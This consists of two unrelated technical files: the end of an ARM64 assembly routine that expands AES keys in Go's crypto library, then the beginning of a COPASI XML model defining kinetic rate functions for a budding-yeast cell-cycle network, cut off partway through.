AESIMC V3.B16, V12.B16
VLD1 (R10), [V0.B16]
VST1.P [V0.B16], 16(R11)
VST1.P [V12.B16, V13.B16, V14.B16, V15.B16], 64(R11)
VST1.P [V8.B16, V9.B16, V10.B16, V11.B16], 64(R11)
VST1 [V4.B16, V5.B16, V6.B16, V7.B16], (R11)
B ksDone
ks256:
LDP invSRows<>(SB), (R0, R1)
VMOV R0, V4.D[0]
VMOV R1, V4.D[1]
LDPW (R9), (R0, R1)
LDPW 8(R9), (R2, R3)
LDPW 16(R9), (R4, R5)
LDPW 24(R9), (R6, R7)
STPW.P (R0, R1), 8(R10)
STPW.P (R2, R3), 8(R10)
SUB $7, R8
ks256Loop:
STPW.P (R4, R5), 8(R10)
STPW.P (R6, R7), 8(R10)
VMOV R7, V2.S[0]
WORD $0x4E030042 //TBL V3.B16, [V2.B16], V2.B16
AESE V0.B16, V2.B16
EORW R13, R0
LSLW $1, R13
SUBS $1, R8
VMOV V2.S[0], R9
EORW R9, R0
EORW R0, R1
EORW R1, R2
EORW R2, R3
VMOV R3, V2.S[0]
WORD $0x4E040042 //TBL V3.B16, [V2.B16], V2.B16
AESE V0.B16, V2.B16
VMOV V2.S[0], R9
EORW R9, R4
EORW R4, R5
EORW R5, R6
EORW R6, R7
STPW.P (R0, R1), 8(R10)
STPW.P (R2, R3), 8(R10)
BNE ks256Loop
CBZ R11, ksDone
SUB $240, R10
VLD1.P 64(R10), [V0.B16, V1.B16, V2.B16, V3.B16]
VMOV V0.B16, V7.B16
AESIMC V1.B16, V6.B16
AESIMC V2.B16, V5.B16
AESIMC V3.B16, V4.B16
VLD1.P 64(R10), [V0.B16, V1.B16, V2.B16, V3.B16]
AESIMC V0.B16, V11.B16
AESIMC V1.B16, V10.B16
AESIMC V2.B16, V9.B16
AESIMC V3.B16, V8.B16
VLD1.P 64(R10), [V0.B16, V1.B16, V2.B16, V3.B16]
AESIMC V0.B16, V15.B16
AESIMC V1.B16, V14.B16
AESIMC V2.B16, V13.B16
AESIMC V3.B16, V12.B16
VLD1 (R10), [V0.B16, V1.B16, V2.B16]
AESIMC V0.B16, V18.B16
AESIMC V1.B16, V17.B16
VMOV V2.B16, V16.B16
VST1.P [V16.B16, V17.B16, V18.B16], 48(R11)
VST1.P [V12.B16, V13.B16, V14.B16, V15.B16], 64(R11)
VST1.P [V8.B16, V9.B16, V10.B16, V11.B16], 64(R11)
VST1 [V4.B16, V5.B16, V6.B16, V7.B16], (R11)
ksDone:
RET
| GAS | 4 | Havoc-OS/androidprebuilts_go_linux-x86 | src/crypto/aes/asm_arm64.s | [
"BSD-3-Clause"
] |
<?xml version="1.0" encoding="UTF-8"?>
<!-- generated with COPASI 4.14 (Build 89+) (http://www.copasi.org) at 2014-11-11 17:07:04 UTC -->
<?oxygen RNGSchema="http://www.copasi.org/static/schema/CopasiML.rng" type="xml"?>
<COPASI xmlns="http://www.copasi.org/static/schema" versionMajor="4" versionMinor="14" versionDevel="89" copasiSourcesModified="1">
<ListOfFunctions>
<Function key="Function_44" name="GK" type="UserDefined" reversible="unspecified">
<Expression>
2*A4*A1/(A2-A1+A3*A2+A4*A1+((A2-A1+A3*A2+A4*A1)^2-4*(A2-A1)*A4*A1)^(1/2))
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_385" name="A1" order="0" role="variable"/>
<ParameterDescription key="FunctionParameter_383" name="A2" order="1" role="variable"/>
<ParameterDescription key="FunctionParameter_381" name="A3" order="2" role="variable"/>
<ParameterDescription key="FunctionParameter_387" name="A4" order="3" role="variable"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_48" name="function_4_Synthesis of CLN2" type="UserDefined" reversible="false">
<Expression>
(ksn2_p+ksn2_p_p*(SBF*cell))*MASS
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_366" name="MASS" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_370" name="SBF" order="1" role="modifier"/>
<ParameterDescription key="FunctionParameter_368" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_371" name="ksn2_p" order="3" role="constant"/>
<ParameterDescription key="FunctionParameter_375" name="ksn2_p_p" order="4" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_49" name="function_4_Degradation of CLN2" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdn2,CLN2*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_369" name="CLN2" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_373" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_365" name="kdn2" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_50" name="function_4_Synthesis of CLB2" type="UserDefined" reversible="false">
<Expression>
(ksb2_p+ksb2_p_p*(MCM1*cell))*MASS
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_358" name="MASS" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_362" name="MCM1" order="1" role="modifier"/>
<ParameterDescription key="FunctionParameter_360" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_364" name="ksb2_p" order="3" role="constant"/>
<ParameterDescription key="FunctionParameter_367" name="ksb2_p_p" order="4" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_51" name="function_4_Degradation of CLB2" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdb2,CLB2*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_361" name="CLB2" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_357" name="Vdb2" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_378" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_52" name="function_4_Synthesis of CLB5" type="UserDefined" reversible="false">
<Expression>
(ksb5_p+ksb5_p_p*(SBF*cell))*MASS
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_350" name="MASS" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_354" name="SBF" order="1" role="modifier"/>
<ParameterDescription key="FunctionParameter_352" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_356" name="ksb5_p" order="3" role="constant"/>
<ParameterDescription key="FunctionParameter_359" name="ksb5_p_p" order="4" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_53" name="function_4_Degradation of CLB5" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdb5,CLB5*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_353" name="CLB5" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_349" name="Vdb5" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_363" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_54" name="function_4_Synthesis of SIC1" type="UserDefined" reversible="false">
<Expression>
(ksc1_p+ksc1_p_p*(SWI5*cell))/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_346" name="SWI5" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_344" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_348" name="ksc1_p" order="2" role="constant"/>
<ParameterDescription key="FunctionParameter_351" name="ksc1_p_p" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_55" name="function_4_Phosphorylation of SIC1" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vkpc1,SIC1*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_347" name="SIC1" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_343" name="Vkpc1" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_342" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_56" name="function_4_Dephosphorylation of SIC1" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vppc1,SIC1P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_345" name="SIC1P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_341" name="Vppc1" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_339" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_57" name="function_4_Fast Degradation of SIC1P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kd3c1,SIC1P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_355" name="SIC1P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_336" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_338" name="kd3c1" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_58" name="function_4_Assoc. of CLB2 and SIC1" type="UserDefined" reversible="false">
<Expression>
Mass_Action_2(kasb2,CLB2*cell,SIC1*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_340" name="CLB2" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_331" name="SIC1" order="1" role="substrate"/>
<ParameterDescription key="FunctionParameter_333" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_335" name="kasb2" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_59" name="function_4_Dissoc. of CLB2/SIC1 complex" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdib2,C2*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_334" name="C2" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_329" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_330" name="kdib2" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_60" name="function_4_Assoc. of CLB5 and SIC1" type="UserDefined" reversible="false">
<Expression>
Mass_Action_2(kasb5,CLB5*cell,SIC1*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_332" name="CLB5" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_324" name="SIC1" order="1" role="substrate"/>
<ParameterDescription key="FunctionParameter_326" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_328" name="kasb5" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_61" name="function_4_Dissoc. of CLB5/SIC1" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdib5,C5*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_327" name="C5" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_322" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_323" name="kdib5" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_62" name="function_4_Phosphorylation of C2" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vkpc1,C2*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_325" name="C2" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_321" name="Vkpc1" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_319" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_63" name="function_4_Dephosphorylation of C2P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vppc1,C2P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_337" name="C2P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_318" name="Vppc1" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_316" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_64" name="function_4_Phosphorylation of C5" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vkpc1,C5*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_320" name="C5" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_315" name="Vkpc1" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_313" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_65" name="function_4_Dephosphorylation of C5P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vppc1,C5P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_317" name="C5P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_312" name="Vppc1" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_310" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_66" name="function_4_Degradation of CLB2 in C2" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdb2,C2*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_314" name="C2" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_309" name="Vdb2" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_307" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_67" name="function_4_Degradation of CLB5 in C5" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdb5,C5*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_311" name="C5" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_306" name="Vdb5" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_304" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_68" name="function_4_Degradation of SIC1 in C2P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kd3c1,C2P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_308" name="C2P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_301" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_303" name="kd3c1" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_69" name="function_4_Degradation of SIC1P in C5P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kd3c1,C5P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_305" name="C5P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_298" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_300" name="kd3c1" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_70" name="function_4_Degradation of CLB2 in C2P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdb2,C2P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_302" name="C2P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_297" name="Vdb2" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_295" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_71" name="function_4_Degradation of CLB5 in C5P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdb5,C5P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_299" name="C5P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_294" name="Vdb5" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_292" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_72" name="function_4_CDC6 synthesis" type="UserDefined" reversible="false">
<Expression>
(ksf6_p+ksf6_p_p*(SWI5*cell)+ksf6_p_p_p*(SBF*cell))/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_283" name="SBF" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_289" name="SWI5" order="1" role="modifier"/>
<ParameterDescription key="FunctionParameter_287" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_291" name="ksf6_p" order="3" role="constant"/>
<ParameterDescription key="FunctionParameter_296" name="ksf6_p_p" order="4" role="constant"/>
<ParameterDescription key="FunctionParameter_285" name="ksf6_p_p_p" order="5" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_73" name="function_4_Phosphorylation of CDC6" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vkpf6,CDC6*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_286" name="CDC6" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_282" name="Vkpf6" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_290" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_74" name="function_4_Dephosphorylation of CDC6" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vppf6,CDC6P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_284" name="CDC6P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_293" name="Vppf6" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_280" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_75" name="function_4_Degradation of CDC6P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kd3f6,CDC6P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_288" name="CDC6P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_277" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_279" name="kd3f6" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_76" name="function_4_CLB2/CDC6 complex formation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_2(kasf2,CLB2*cell,CDC6*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_272" name="CDC6" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_281" name="CLB2" order="1" role="substrate"/>
<ParameterDescription key="FunctionParameter_274" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_276" name="kasf2" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_77" name="function_4_CLB2/CDC6 dissociation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdif2,F2*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_275" name="F2" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_270" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_271" name="kdif2" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_78" name="function_4_CLB5/CDC6 complex formation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_2(kasf5,CLB5*cell,CDC6*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_265" name="CDC6" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_273" name="CLB5" order="1" role="substrate"/>
<ParameterDescription key="FunctionParameter_267" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_269" name="kasf5" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_79" name="function_4_CLB5/CDC6 dissociation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdif5,F5*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_268" name="F5" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_246" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_258" name="kdif5" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_80" name="function_4_F2 phosphorylation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vkpf6,F2*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_266" name="F2" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_254" name="Vkpf6" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_264" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_81" name="function_4_F2P dephosphorylation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vppf6,F2P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_278" name="F2P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_566" name="Vppf6" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_568" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_82" name="function_4_F5 phosphorylation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vkpf6,F5*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_262" name="F5" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_569" name="Vkpf6" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_571" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_83" name="function_4_F5P dephosphorylation" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vppf6,F5P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_567" name="F5P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_572" name="Vppf6" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_574" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_84" name="function_4_CLB2 degradation in F2" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdb2,F2*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_570" name="F2" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_575" name="Vdb2" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_577" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_85" name="function_4_CLB5 degradation in F5" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdb5,F5*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_573" name="F5" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_578" name="Vdb5" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_580" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_86" name="function_4_CDC6 degradation in F2P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kd3f6,F2P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_576" name="F2P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_583" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_581" name="kd3f6" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_87" name="function_4_CDC6 degradation in F5P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kd3f6,F5P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_579" name="F5P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_586" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_584" name="kd3f6" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_88" name="function_4_CLB2 degradation in F2P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdb2,F2P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_582" name="F2P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_587" name="Vdb2" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_589" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_89" name="function_4_CLB5 degradation in F5P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(Vdb5,F5P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_585" name="F5P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_590" name="Vdb5" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_592" name="cell" order="2" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_90" name="function_4_Synthesis of SWI5" type="UserDefined" reversible="false">
<Expression>
(ksswi_p+ksswi_p_p*(MCM1*cell))/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_595" name="MCM1" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_597" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_593" name="ksswi_p" order="2" role="constant"/>
<ParameterDescription key="FunctionParameter_588" name="ksswi_p_p" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_91" name="function_4_Degradation of SWI5" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdswi,SWI5*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_594" name="SWI5" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_599" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_598" name="kdswi" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_92" name="function_4_Degradation of SWI5P" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kdswi,SWI5P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_596" name="SWI5P" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_602" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_600" name="kdswi" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_93" name="function_4_Activation of SWI5" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kaswi*(CDC14*cell),SWI5P*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_591" name="CDC14" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_607" name="SWI5P" order="1" role="substrate"/>
<ParameterDescription key="FunctionParameter_605" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_603" name="kaswi" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_94" name="function_4_Inactivation of SWI5" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kiswi*(CLB2*cell),SWI5*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_604" name="CLB2" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_611" name="SWI5" order="1" role="substrate"/>
<ParameterDescription key="FunctionParameter_609" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_608" name="kiswi" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_95" name="function_4_Activation of IEP" type="UserDefined" reversible="false">
<Expression>
"Michaelis-Menten"(Vaiep,Jaiep,1,IE*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_613" name="IE" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_601" name="Jaiep" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_612" name="Vaiep" order="2" role="constant"/>
<ParameterDescription key="FunctionParameter_615" name="cell" order="3" role="volume"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_96" name="function_4_Inactivation" type="UserDefined" reversible="false">
<Expression>
"Michaelis-Menten"(1,Jiiep,kiiep,IEP*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_617" name="IEP" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_616" name="Jiiep" order="1" role="constant"/>
<ParameterDescription key="FunctionParameter_619" name="cell" order="2" role="volume"/>
<ParameterDescription key="FunctionParameter_606" name="kiiep" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_97" name="function_4_Synthesis of inactive CDC20" type="UserDefined" reversible="false">
<Expression>
(ks20_p+ks20_p_p*(MCM1*cell))/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_621" name="MCM1" order="0" role="modifier"/>
<ParameterDescription key="FunctionParameter_623" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_620" name="ks20_p" order="2" role="constant"/>
<ParameterDescription key="FunctionParameter_610" name="ks20_p_p" order="3" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_98" name="function_4_Degradation of inactiveCDC20" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kd20,CDC20i*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_614" name="CDC20i" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_625" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_624" name="kd20" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_99" name="function_4_Degradation of active CDC20" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(kd20,CDC20*cell)/cell
</Expression>
<ListOfParameterDescriptions>
<ParameterDescription key="FunctionParameter_622" name="CDC20" order="0" role="substrate"/>
<ParameterDescription key="FunctionParameter_628" name="cell" order="1" role="volume"/>
<ParameterDescription key="FunctionParameter_626" name="kd20" order="2" role="constant"/>
</ListOfParameterDescriptions>
</Function>
<Function key="Function_100" name="function_4_Activation of CDC20" type="UserDefined" reversible="false">
<Expression>
Mass_Action_1(ka20_p+ka20_p_p*(IEP*cell),CDC20i*cell)/cell
</Expression>
<ListOfParameterDescriptions>
